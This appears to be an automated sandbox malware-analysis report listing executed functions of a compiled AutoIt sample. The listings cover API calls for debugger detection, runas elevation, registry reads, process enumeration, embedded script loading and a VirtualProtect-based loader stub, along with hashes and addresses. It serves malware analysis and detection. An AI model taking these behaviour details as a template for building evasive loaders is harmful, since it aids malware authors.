3d3e76 105957->105960 105959->105957 105959->105960 105960->105948 105961->105960 105963 3c89a8 RtlEnterCriticalSection 105962->105963 105964 3c8995 105962->105964 105963->105873 105970 3c8a0c 105964->105970 105966 3c899b 105966->105963 105994 3c1d7b 47 API calls 3 library calls 105966->105994 105969->105877 105971 3c8a18 __getstream 105970->105971 105972 3c8a39 105971->105972 105973 3c8a21 105971->105973 105976 3c8aa1 __getstream 105972->105976 105988 3c8a37 105972->105988 105995 3c8e52 47 API calls __NMSG_WRITE 105973->105995 105975 3c8a26 105996 3c8eb2 47 API calls 6 library calls 105975->105996 105976->105966 105979 3c8a4d 105980 3c8a54 105979->105980 105981 3c8a63 105979->105981 105999 3c889e 47 API calls __getptd_noexit 105980->105999 105984 3c8984 __lock 46 API calls 105981->105984 105982 3c8a2d 105997 3c1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 105982->105997 105987 3c8a6a 105984->105987 105986 3c8a59 105986->105976 105989 3c8a8e 105987->105989 105990 3c8a79 InitializeCriticalSectionAndSpinCount 105987->105990 105988->105972 105998 3c7660 47 API calls __crtGetStringTypeA_stat 105988->105998 106000 3c28ca 105989->106000 105991 3c8a94 105990->105991 106006 3c8aaa RtlLeaveCriticalSection _doexit 105991->106006 105995->105975 105996->105982 105998->105979 105999->105986 106001 3c28fc __dosmaperr 106000->106001 106002 3c28d3 RtlFreeHeap 106000->106002 106001->105991 106002->106001 106003 3c28e8 106002->106003 106007 3c889e 47 API calls __getptd_noexit 106003->106007 106005 3c28ee GetLastError 106005->106001 106006->105976 106007->106005 106008->105894 106009->105901 106010->105906 106012 3c7abb 106011->106012 106017 3c7945 106012->106017 106018 3c795f _memset __call_reportfault 106017->106018 106019 3c797f IsDebuggerPresent 106018->106019 106025 3c8e3c SetUnhandledExceptionFilter UnhandledExceptionFilter 106019->106025 106022 3c7a43 __call_reportfault 106025->106022 106034->105919 106853 414ddc 106854 414de6 VariantClear 106853->106854 106855 3b4472 106853->106855 106854->106855

                                                                                                                      Executed Functions

                                                                                                                      Function 003A374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 003A376D
                                                                                                                        • Part of subcall function 003A4257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00000000,00000001,00000000), ref: 003A428C
                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?), ref: 003A377F
                                                                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_LWQDFZ.exe,00000104,?,00461120,C:\Users\user\Desktop\._cache_LWQDFZ.exe,00461124,?,?), ref: 003A37EE
                                                                                                                        • Part of subcall function 003A34F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 003A352A
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003A3860
                                                                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00452934,00000010), ref: 004121C5
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,?), ref: 004121FD
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00412232
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0043DAA4), ref: 00412290
                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 00412297
                                                                                                                        • Part of subcall function 003A30A5: GetSysColorBrush.USER32(0000000F), ref: 003A30B0
                                                                                                                        • Part of subcall function 003A30A5: LoadCursorW.USER32(00000000,00007F00), ref: 003A30BF
                                                                                                                        • Part of subcall function 003A30A5: LoadIconW.USER32(00000063), ref: 003A30D5
                                                                                                                        • Part of subcall function 003A30A5: LoadIconW.USER32(000000A4), ref: 003A30E7
                                                                                                                        • Part of subcall function 003A30A5: LoadIconW.USER32(000000A2), ref: 003A30F9
                                                                                                                        • Part of subcall function 003A30A5: RegisterClassExW.USER32(?), ref: 003A3167
                                                                                                                        • Part of subcall function 003A2E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003A2ECB
                                                                                                                        • Part of subcall function 003A2E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 003A2EEC
                                                                                                                        • Part of subcall function 003A2E9D: ShowWindow.USER32(00000000), ref: 003A2F00
                                                                                                                        • Part of subcall function 003A2E9D: ShowWindow.USER32(00000000), ref: 003A2F09
                                                                                                                        • Part of subcall function 003A3598: _memset.LIBCMT ref: 003A35BE
                                                                                                                        • Part of subcall function 003A3598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 003A3667
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                      • String ID: C:\Users\user\Desktop\._cache_LWQDFZ.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas$"F
                                                                                                                      • API String ID: 4253510256-3087517855
                                                                                                                      • Opcode ID: fc75448a53ff3ab068836f0e790ade57028805e9d770f55eb5479f401b23242f
                                                                                                                      • Instruction ID: 9c7bd7b4e1f5f0065728c2f727e76998408cdd3f8afaa572bbbad7cce7a1931b
                                                                                                                      • Opcode Fuzzy Hash: fc75448a53ff3ab068836f0e790ade57028805e9d770f55eb5479f401b23242f
                                                                                                                      • Instruction Fuzzy Hash: D051DB71A44244BBCB12E7A0DC46FEE7778DB1B710F140067F641961A1E7F88A89CB6B
                                                                                                                      Function 004030AD Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1168 4030ad-40315b call 3aca8e call 3ad3d2 * 3 call 3a84a6 call 403d7b call 403af7 1183 403166-403170 1168->1183 1184 40315d-403161 1168->1184 1186 4031a2 1183->1186 1187 403172-403187 RegConnectRegistryW 1183->1187 1185 4031e6-4031f2 call 3ed7e4 1184->1185 1196 403504-403527 call 3a5cd3 * 3 1185->1196 1191 4031a6-4031c3 RegOpenKeyExW 1186->1191 1189 403189-40319a call 3a7ba9 1187->1189 1190 40319c-4031a0 1187->1190 1189->1185 1190->1191 1194 4031c5-4031d7 call 3a7ba9 1191->1194 1195 4031f7-403227 call 3a84a6 RegQueryValueExW 1191->1195 1206 4031e3-4031e4 1194->1206 1207 4031d9-4031dd RegCloseKey 1194->1207 1203 403229-403239 call 3a7ba9 1195->1203 1204 40323e-403254 call 3a7ba9 1195->1204 1215 4034df-4034e6 call 3ed7e4 1203->1215 1216 40325a-40325f 1204->1216 1217 4034dc-4034dd 1204->1217 1206->1185 1207->1206 1223 4034eb-4034fc RegCloseKey 1215->1223 1220 403265-403268 1216->1220 1221 40344c-403498 call 3c010a call 3a84a6 RegQueryValueExW 1216->1221 1217->1215 1224 4033d9-403411 call 3ead14 call 3a84a6 RegQueryValueExW 1220->1224 1225 40326e-403273 1220->1225 1244 4034b4-4034ce call 3a7ba9 call 3ed7e4 1221->1244 1245 40349a-4034a6 1221->1245 1223->1196 1229 4034fe-403502 RegCloseKey 1223->1229 1224->1223 1252 403417-403447 call 3a7ba9 call 3ed7e4 call 3b2570 1224->1252 1226 403279-40327c 1225->1226 1227 40338d-4033d4 call 3a84a6 RegQueryValueExW call 3b2570 1225->1227 1231 4032de-40332b call 3c010a call 3a84a6 RegQueryValueExW 1226->1231 1232 40327e-403281 1226->1232 1227->1223 1229->1196 1231->1244 1261 403331-403348 1231->1261 1232->1217 1236 403287-4032d9 call 3a84a6 RegQueryValueExW call 3b2570 1232->1236 1236->1223 1264 4034d3-4034da call 3c017e 1244->1264 1251 4034aa-4034b2 call 3aca8e 1245->1251 1251->1264 1252->1223 1261->1251 1265 40334e-403355 1261->1265 1264->1223 1268 403357-403358 1265->1268 1269 40335c-403361 1265->1269 1268->1269 1270 403363-403367 1269->1270 1271 403376-40337b 1269->1271 1274 403371-403374 1270->1274 1275 403369-40336d 1270->1275 1271->1251 1276 403381-403388 1271->1276 1274->1270 1274->1271 1275->1274 1276->1251
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00403AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00402AA6,?,?), ref: 00403B0E
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040317F
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 0040321E
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 004032B6
                                                                                                                      • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 004034F5
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00403502
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1240663315-0
                                                                                                                      • Opcode ID: 3fdeba90fc071f7d9bddcbb9f919d8714024f13dacd011b4d56e70aef24ae10b
                                                                                                                      • Instruction ID: ef9ef29b949d9ddb0a57f022e28ff7e068ad2c0df7936ed20f2530d1f2e3eaba
                                                                                                                      • Opcode Fuzzy Hash: 3fdeba90fc071f7d9bddcbb9f919d8714024f13dacd011b4d56e70aef24ae10b
                                                                                                                      • Instruction Fuzzy Hash: 91E17D75604200AFCB15DF25C995D2BBBE8EF89314F04896EF84ADB2A1DB34ED01CB56
                                                                                                                      Function 003A29C2 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151timewindowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1278 3a29c2-3a29e2 1280 3a2a42-3a2a44 1278->1280 1281 3a29e4-3a29e7 1278->1281 1280->1281 1284 3a2a46 1280->1284 1282 3a2a48 1281->1282 1283 3a29e9-3a29f0 1281->1283 1288 3a2a4e-3a2a51 1282->1288 1289 412307-412335 call 3a322e call 3bec33 1282->1289 1285 3a2aac-3a2ab4 PostQuitMessage 1283->1285 1286 3a29f6-3a29fb 1283->1286 1287 3a2a2b-3a2a33 NtdllDefWindowProc_W 1284->1287 1293 3a2a72-3a2a74 1285->1293 1291 3a2a01-3a2a03 1286->1291 1292 41238f-4123a3 call 3e57fb 1286->1292 1294 3a2a39-3a2a3f 1287->1294 1295 3a2a53-3a2a54 1288->1295 1296 3a2a76-3a2a9d SetTimer RegisterClipboardFormatW 1288->1296 1324 41233a-412341 1289->1324 1300 3a2a09-3a2a0e 1291->1300 1301 3a2ab6-3a2ac0 call 3a1e58 1291->1301 1292->1293 1317 4123a9 1292->1317 1293->1294 1297 3a2a5a-3a2a6d KillTimer call 3a2b94 call 3a2ac7 1295->1297 1298 4122aa-4122ad 1295->1298 1296->1293 1302 3a2a9f-3a2aaa CreatePopupMenu 1296->1302 1297->1293 1310 4122e3-412302 MoveWindow 1298->1310 1311 4122af-4122b1 1298->1311 1306 412374-41237b 1300->1306 1307 3a2a14-3a2a19 1300->1307 1318 3a2ac5 1301->1318 1302->1293 1306->1287 1313 412381-41238a call 3db31f 1306->1313 1315 3a2a1f-3a2a25 1307->1315 1316 41235f-41236f call 3e5fdb 1307->1316 1310->1293 1319 4122b3-4122b6 1311->1319 1320 4122d2-4122de SetFocus 1311->1320 1313->1287 1315->1287 1315->1324 1316->1293 1317->1287 1318->1293 1319->1315 1325 4122bc-4122cd call 3a322e 1319->1325 1320->1293 1324->1287 1328 412347-41235a call 3a2b94 call 3a3598 1324->1328 1325->1293 1328->1287
                                                                                                                      APIs
                                                                                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 003A2A33
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 003A2A5D
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003A2A80
                                                                                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 003A2A8B
                                                                                                                      • CreatePopupMenu.USER32 ref: 003A2A9F
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 003A2AAE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 157504867-2362178303
                                                                                                                      • Opcode ID: 548f32600f7387e18830efaf0ccc1d2ef89f41c9e93c3eb648f13d68877e1b93
                                                                                                                      • Instruction ID: 3da54a9451d0df7718e0259e679cd0e17611662b28b84eb4324061c5894f6991
                                                                                                                      • Opcode Fuzzy Hash: 548f32600f7387e18830efaf0ccc1d2ef89f41c9e93c3eb648f13d68877e1b93
                                                                                                                      • Instruction Fuzzy Hash: 5E415B31204645AFDB3B6F6C9D09BBB365AE717340F084126F902D69B1EFB48C90836E
                                                                                                                      Function 003BE47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32(?), ref: 003BE4A7
                                                                                                                        • Part of subcall function 003A7E53: _memmove.LIBCMT ref: 003A7EB9
                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,0043DC28,?,?), ref: 003BE567
                                                                                                                      • GetNativeSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5BC
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 003BE5C7
                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 003BE5DA
                                                                                                                      • GetSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5E4
                                                                                                                      • GetSystemInfo.KERNEL32(?,0043DC28,?,?), ref: 003BE5F0
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2717633055-0
                                                                                                                      • Opcode ID: 6dae317344067318d983cc6e748d5ca9dca423f92a2905786df3389063543b83
                                                                                                                      • Instruction ID: b0be1b4f60099e9ab846a00d1d8f44304db743d39fba20539a88f4320dade003
                                                                                                                      • Opcode Fuzzy Hash: 6dae317344067318d983cc6e748d5ca9dca423f92a2905786df3389063543b83
                                                                                                                      • Instruction Fuzzy Hash: F661E3B1909284CFCF26CF6C98C11EA7FB46F6A308F1945DAD8449F70BD624C949CB69
                                                                                                                      Function 003A31F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 003A3202
                                                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 003A3219
                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004157D7
                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004157EC
                                                                                                                      • LockResource.KERNEL32(?), ref: 004157FF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                      • String ID: SCRIPT
                                                                                                                      • API String ID: 3051347437-3967369404
                                                                                                                      • Opcode ID: 7e0f08830317a1c7ed25f39e905fb6430c16b7ef3f37680949de681d9c9ec176
                                                                                                                      • Instruction ID: b972d3a8412cf51b16ea50c4e3906950b67c77995ccbb76c0ffef4560e07274d
                                                                                                                      • Opcode Fuzzy Hash: 7e0f08830317a1c7ed25f39e905fb6430c16b7ef3f37680949de681d9c9ec176
                                                                                                                      • Instruction Fuzzy Hash: A9117970644705BFE7269BA5EC48F677BB9EBCAB41F208869F41286290DB71DD018A70
                                                                                                                      Function 003E6F5B Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003E6F7D
                                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 003E6F8D
                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 003E6FAC
                                                                                                                      • __wsplitpath.LIBCMT ref: 003E6FD0
                                                                                                                      • _wcscat.LIBCMT ref: 003E6FE3
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 003E7022
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1605983538-0
                                                                                                                      • Opcode ID: 975c3dbb471392c3e5b5fd9243217e97b1b4b1a283cabaa72f328970f5b791df
                                                                                                                      • Instruction ID: 4efbd47b18e1d97891b71d1ebeaa2663ec774e812dd8e3f8c8d9b19ec2d19f78
                                                                                                                      • Opcode Fuzzy Hash: 975c3dbb471392c3e5b5fd9243217e97b1b4b1a283cabaa72f328970f5b791df
                                                                                                                      • Instruction Fuzzy Hash: 7921A771904268ABDB21ABA1CC89FEEB7BCAB49300F5004E9F505D7181E7719F85DB60
                                                                                                                      Function 005020B0 Relevance: 7.7, APIs: 5, Instructions: 206librarymemoryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(?), ref: 005021EA
                                                                                                                      • GetProcAddress.KERNEL32(?,004FBFF9), ref: 00502208
                                                                                                                      • ExitProcess.KERNEL32(?,004FBFF9), ref: 00502219
                                                                                                                      • VirtualProtect.KERNEL32(003A0000,00001000,00000004,?,00000000), ref: 00502267
                                                                                                                      • VirtualProtect.KERNEL32(003A0000,00001000), ref: 0050227C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996367037-0
                                                                                                                      • Opcode ID: 15a637730f4b77c4367a568fe8559d07bd9429c126755c54d44d2d67ed04ba20
                                                                                                                      • Instruction ID: f3862f642c0cac664031b954242e2fc61c10694e22844c2bafc9f924b0b97a53
                                                                                                                      • Opcode Fuzzy Hash: 15a637730f4b77c4367a568fe8559d07bd9429c126755c54d44d2d67ed04ba20
                                                                                                                      • Instruction Fuzzy Hash: 6551FA72A447525BD7219EB8CCC866CBFA4FB55324F280738CAE5C73C6E7A05806C761
                                                                                                                      Function 003EEFCD Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003E78AD: GetFullPathNameW.KERNEL32(?,00000105,?,?), ref: 003E78CB
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 003EF04D
                                                                                                                      • CoCreateInstance.COMBASE(0042DA7C,00000000,00000001,0042D8EC,?), ref: 003EF066
                                                                                                                      • CoUninitialize.COMBASE ref: 003EF083
                                                                                                                        • Part of subcall function 003A84A6: __swprintf.LIBCMT ref: 003A84E5
                                                                                                                        • Part of subcall function 003A84A6: __itow.LIBCMT ref: 003A8519
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                                                      • String ID: .lnk
                                                                                                                      • API String ID: 2126378814-24824748
                                                                                                                      • Opcode ID: 867dd87af13059c749bbdd4863f7995d25f756479828ae3af0ecf7938e302125
                                                                                                                      • Instruction ID: 44155caf2aeb7b52f86cc46761dcee9bed43aa7097b3f4f27c7392cd3d1e06fb
                                                                                                                      • Opcode Fuzzy Hash: 867dd87af13059c749bbdd4863f7995d25f756479828ae3af0ecf7938e302125
                                                                                                                      • Instruction Fuzzy Hash: AAA186356043119FCB11DF15C884E5ABBE5FF89320F148A98F89A9B3A1CB71ED05CB91
                                                                                                                      Function 003ADCD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 540COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
